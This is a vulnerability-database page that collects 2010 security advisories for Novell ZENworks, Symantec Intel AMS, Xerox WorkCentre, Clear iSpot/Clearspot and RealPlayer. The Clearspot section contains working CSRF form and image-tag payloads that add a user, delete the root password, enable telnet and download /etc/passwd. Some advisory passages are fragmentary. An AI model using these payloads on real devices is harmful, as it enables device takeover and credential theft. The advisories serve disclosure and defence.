VARIoT IoT vulnerabilities database
| VAR-201012-0610 | No CVE | Novell ZENWorks Remote Management Agent DN Name Remote Code Execution Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
When processing the Console DN field of incoming requests, the process can be made to overflow a stack buffer by 2 bytes. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ZenRem32.exe process which listens by default on TCP and UDP ports 1761. When processing incoming connections with specific version fields the process fails to initialize a string buffer intended to hold the name of the client. After making allocations based on the size of the uninitialized string, ZenRem32 proceeds to convert the buffer between wide-char and multi-byte data types. As the pointer is directed at uninitialized memory, this can be abused to corrupt the heap. An attacker can leverage this to execute remote code under the context of the SYSTEM user. When handling the filename in a Read Request (0x01) packet type the process blindly copies user supplied data into a fixed-length buffer on the stack. Successful exploits will compromise the affected application. Failed exploit attempts will result in a denial-of-service condition.
Novell ZENworks 7 Desktop Management 7 SP1 is vulnerable. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Novell ZENworks Desktop Management Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA42598
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42598/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42598
RELEASE DATE:
2010-12-21
DISCUSS ADVISORY:
http://secunia.com/advisories/42598/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42598/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42598
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Novell ZENworks Desktop
Management, which can be exploited by malicious people to compromise
a vulnerable system.
1) An error exists in the Remote Management Agent within ZenRem32.exe
when processing certain version fields. This can be exploited to
corrupt heap memory by sending a specially crafted packet to TCP or
UDP port 1761. This can be exploited to cause a stack-based buffer
overflow by sending a specially crafted packet to TCP or UDP port
1761. This can be exploited
to cause a stack-based buffer overflow by sending a specially crafted
packet to UDP port 69.
SOLUTION:
Apply Interim Release 4 Hot Patch 5.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
1, 2) sb, via ZDI.
3) Francis Provencher, Protek Research Lab's.
ORIGINAL ADVISORY:
Novell:
http://www.novell.com/support/viewContent.do?externalId=7007320
http://www.novell.com/support/viewContent.do?externalId=7007339
http://www.novell.com/support/viewContent.do?externalId=7007321
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-283/
http://www.zerodayinitiative.com/advisories/ZDI-10-284/
http://www.zerodayinitiative.com/advisories/ZDI-10-285/
Protek Research Lab's:
http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=20&Itemid=20
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-- Vendor Response:
Novell states:
Fixed in ZENworks 7 Desktop Management Support Pack 1 Interim Release 4
Hot Patch 5:
http://download.novell.com/Download?buildid=r9kcCymJ7Os
Documented in TID 7007320
http://www.novell.com/support/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=7007320&sliceId=1
-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-12-13 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* sb
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0127 | CVE-2010-3268 | Symantec Antivirus Corporate Edition Used in etc. Intel AMS of GetStringAMSHandler Service disruption in functions (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request. Symantec Antivirus is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Symantec Antivirus Corporate Edition 10.1.4.4010 is vulnerable; other versions may also be affected. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
Symantec Intel Handler Service Remote DoS
1. *Advisory Information*
Title: Symantec Intel Handler Service Remote DoS
Advisory Id: CORE-2010-0728
Advisory URL:
[http://www.coresecurity.com/content/symantec-intel-handler-service-remote-dos]
Date published: 2010-12-13
Date of last update: 2010-12-13
Vendors contacted: Symantec
Release mode: User release
2. *Vulnerability Information*
Class: Input validation error [CWE-20]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3268
Bugtraq ID: N/A
3. A source address in
a 'MOV' instruction is calculated from values present in the request,
causing a remote denial-of-service.
4. *Vulnerable packages*
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
6. During the SEP 11.x
engineering phase SEP was rewritten so that it no longer uses Intel AMS
code. The installation of AMS is disabled by default for SEP versions
that include it. The only workaround is to disable Intel AMS.
7. *Credits*
This vulnerability was discovered and researched by Nahuel Riva from
Core Security Technologies. Publication was coordinated by Jorge
Lucangeli Obes.
8. *Technical Description / Proof of Concept Code*
The request is handled in 'prgxhndl.dll', called from 'hndlsrvc.exe',
more specifically from function '0x501A105D':
/-----
501A105D /. 55 PUSH EBP
501A105E |. 8BEC MOV EBP,ESP
501A1060 |. 81EC 60040000 SUB ESP,460
501A1066 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
501A1069 |. 57 PUSH EDI
501A106A |. 50 PUSH EAX
501A106B |. 68 34301A50 PUSH prgxhndl.501A3034 ;
ASCII "CommandLine"
501A1070 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
501A1073 |. 8BF9 MOV EDI,ECX
501A1075 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
501A1078 |. E8 33010000 CALL
<JMP.&HNDLRSVC.#17_?GetString@AMSHandler@@QAEHPAXKPADPAPAD@Z>
- -----/
Inside that function, 'GetStringAMSHandler()' is called to parse the
content of the 'CommandLine' field present in the request. In turn,
'GetStringAMSHandler()' forwards the request to function 'AMSLIB.18'
present in 'AMSLIB.dll', and this function ends up calling the function
that crashes, 'AMSGetPastParamList()', also in 'AMSLIB.dll':
/-----
500733AE |. 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
500733B1 |. 50 PUSH EAX
; /Arg1
500733B2 |. E8 54F3FFFF CALL AMSLIB.AMSGetPastParamList
; \AMSGetPastParamList
- -----/
The crash occurs at address '0x5007278B':
/-----
50072786 |. 8B45 F0 |MOV EAX,DWORD PTR SS:[EBP-10]
50072789 |. 33C9 |XOR ECX,ECX
5007278B |. 8A08 |MOV CL,BYTE PTR DS:[EAX]
5007278D |. 85C9 |TEST ECX,ECX
5007278F |. 75 16 |JNZ SHORT AMSLIB.500727A7
- -----/
When trying to read at the memory area pointed to by EAX, this value is
invalid and the service crashes. This part of the code is parsing
(inside a loop) the argument passed in the 'CommandLine' parameter. It
seems that in many parts of the loop the pointer that is loaded from
'[EBP-10]' is calculated from a value present in the request.
9. *Report Timeline*
. 2010-08-12:
Initial notification sent to Symantec. 2010-08-19:
Given that there was no answer since the initial notification, Core
requests a confirmation of reception. 2010-08-19:
Vendor replies that the initial notification was not received. 2010-08-20:
Core resends original advisory draft. 2010-08-20:
Vendor acknowledges reception of advisory draft. 2010-08-25:
Vendor replies that the issue looks like a duplicate of another one,
already planned to be fixed in a September/October timeframe. Vendor
will investigate further and give a definite reply. 2010-08-26:
Core acknowledges this reply. 2010-08-26:
Vendor confirms that the issue is a duplicate, but will give credit to
Nahuel Riva as "secondary finder". Vendor asks to postpone the
publication of the advisory until a fix is released. 2010-08-27:
Core agrees to postpone the publication of the advisory, given that an
estimate release date for the fix is provided. 2010-08-27:
Vendor replies with an estimated release date for the end of September. 2010-08-27:
Core agrees with the estimated release date, and requests the date of
the initial report of the vulnerability. 2010-09-09:
After two weeks with no replies, Core again requests the date of the
initial report of the vulnerability, and asks if the release of the fix
is still on track for the end of September. 2010-09-16:
Vendor replies that they will not be able to release fixes before the
end of the year, as they have to correct third-party code by themselves. 2010-09-21:
Core requests confirmation that the vendor won't release a fix before
the end of the year. 2010-09-22:
Vendor confirms that they won't be able to release fixes until the end
of the year, as fixing third-party code is taking time. However, the
vendor explains that current versions of the product have the vulnerable
functionality disabled, that old versions of the product do not install
the vulnerable functionality by default, and that installation of this
functionality is not recommended. 2010-10-05:
Core requests version numbers for vulnerable and non-vulnerable versions
of the software, and asks if vulnerable users can update to a
non-vulnerable version. 2010-09-06:
Vendor replies with the version numbers and confirms that vulnerable
users have to wait for the patch. 2010-10-07:
Core decides to push the release date forward and wait for the release
of the patch. 2010-10-22:
Core asks Symantec for a precise release date for the fixes, and
explains that the publication of the advisory won't be pushed further
than December 2010. 2010-10-23:
Vendor replies that the last known date was during December, and that
they will confirm a firmer date. 2010-11-01:
Core asks Symantec if a firmer release date has been confirmed. 2010-11-03:
Vendor replies that the engineering team has not confirmed a release
date, and asks if Core can hold the publication of the advisory until
the end of the year. 2010-11-25:
Core replies that the December 13th release date is fixed, and requests
an update on the status of the patches. 2010-12-13:
No update received, advisory CORE-2010-0728 is published.
10. *References*
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/].
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk0GR4UACgkQyNibggitWa1iKQCfYtzFZOnNGpclzNZEDrwM08wr
gwsAn2UYlqC0+IpliLAVTn/ItK4Sc3ne
=Up/o
-----END PGP SIGNATURE-----
.
SOLUTION:
Restrict access to trusted hosts only (e.g. via network access
control lists). ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Symantec Products Intel Alert Management System Multiple
Vulnerabilities
SECUNIA ADVISORY ID:
SA43099
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43099/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43099
RELEASE DATE:
2011-01-27
DISCUSS ADVISORY:
http://secunia.com/advisories/43099/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43099/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43099
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec products,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and compromise a vulnerable system.
1) An error in the Intel AMS2 component when processing certain
messages can be exploited to cause a buffer overflow via specially
crafted packets sent to TCP port 38292.
2) An error in the Intel AMS2 component when processing certain
messages can be exploited to run arbitrary commands via specially
crafted packets sent to TCP port 38292.
3) An error in the Intel AMS2 component when processing certain
messages can be exploited to create arbitrary events (e.g. launch a
program or send an email) via specially crafted messages sent to TCP
port 38292.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
* Symantec System Center 10.x
SOLUTION:
Update to version 10.1 MR10.
* An anonymous researcher via ZDI.
* Jorge Lucangeli Obes, CORE Security.
ORIGINAL ADVISORY:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20110126_00
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20110126_01
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201012-0375 | No CVE | Xerox WorkCentre Scan to Email Information Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
The Xerox WorkCentre is an all-in-one. The scan-to-email feature is flawed. Two different scan-to-Email documents can be mixed into one document. This problem often occurs during high-resolution scanning of complex documents. Can cause sensitive information to leak. Xerox WorkCentre is prone to an information-disclosure vulnerability.
Attackers may be able to exploit this issue to gain access to potentially sensitive information that may aid in further attacks.
The following models of Xerox WorkCentre are vulnerable:
5735
5740
5745
5755
5765
5775
5790
| VAR-201012-0295 | CVE-2010-4507 | ClearSpot of iSpot Cross-site request forgery vulnerability in administrator authentication |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
The following versions are affected:
iSpot 2.0.0.0 (R1679)
Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786). ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Clear iSpot and Clear Clearspot Cross-Site Request Forgery
Vulnerability
SECUNIA ADVISORY ID:
SA42590
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42590/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42590
RELEASE DATE:
2010-12-26
DISCUSS ADVISORY:
http://secunia.com/advisories/42590/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42590/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42590
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Clear iSpot and Clear Clearspot,
which can be exploited by malicious people to conduct cross-site
request forgery attacks.
The application allows users to perform certain actions via HTTP
requests without making proper validity checks to verify the
requests. This can be exploited to e.g. remove the root password or
enable telnet by tricking a logged-in administrator into visiting a
malicious web site.
The vulnerabilities are reported in Clear iSpot version 2.0.0.0,
firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0,
firmware version 1.9.9.4.
SOLUTION:
Do not browse untrusted web sites or follow untrusted links while
being logged-in to the application.
PROVIDED AND/OR DISCOVERED BY:
Matthew Jakubowski, Trustwave's SpiderLabs
ORIGINAL ADVISORY:
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
Published: 2010-12-10 Version: 1.0
Vendor: Clear (http://www.clear.com <http://www.clear.com/>)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior the result of a design choice, and may be present
on multiple versions.
iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version : 1.9.9.4
Hardware Version : R051.2
Device Name : IMW-C615W
Device Manufacturer : INFOMARK (http://infomark.co.kr
<http://infomark.co.kr/>)
Product Description:
iSpot and ClearSpot 4G are portable 4G devices, that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time, on the same 4G connection.
Credit: Matthew Jakubowski of Trustwave's SpiderLabs
CVE: CVE-2010-4507
Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker that is able to coerce a ClearSpot / iSpot user into
following a link can arbitrarily execute system commands on the device. This level
of access also provides a device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.
Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%
20-S%20jaku'>
Remove root password:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2
0-d%20root'>
Enable remote administration access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remo
te_access=YES&remote_access_port=80'>
Enable telnet if not already enabled:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN
ABLE_TELNET=YES'>
Allow remote telnet access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=
YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>
Once compromised, it is possible to download any file from the devices
using
the following method.
Download /etc/passwd file:
<form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi
<http://192.168.1.1/cgi-bin/upgrademain.cgi> ">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>
or
<img
src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHO
D=PATH&FILE_PATH=/etc/passwd'>
Vendor Response:
No official response is available at the time of release.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit
https://www.trustwave.com <https://www.trustwave.com/>
About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201012-0320 | CVE-2010-2999 | RealNetworks RealPlayer of AAC MLLT Atom Integer overflow vulnerability in analysis processing |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a malformed MLLT atom in an AAC file. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer. The application utilizes a size specified in this data structure for allocation of a list of objects. To calculate the size for the allocation, the application will multiply this length by 8. If the multiplication results in a value greater than 32 bits an integer overflow will occur. When copying data into this buffer heap corruption will occur which can lead to code execution under the context of the currently logged in user. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
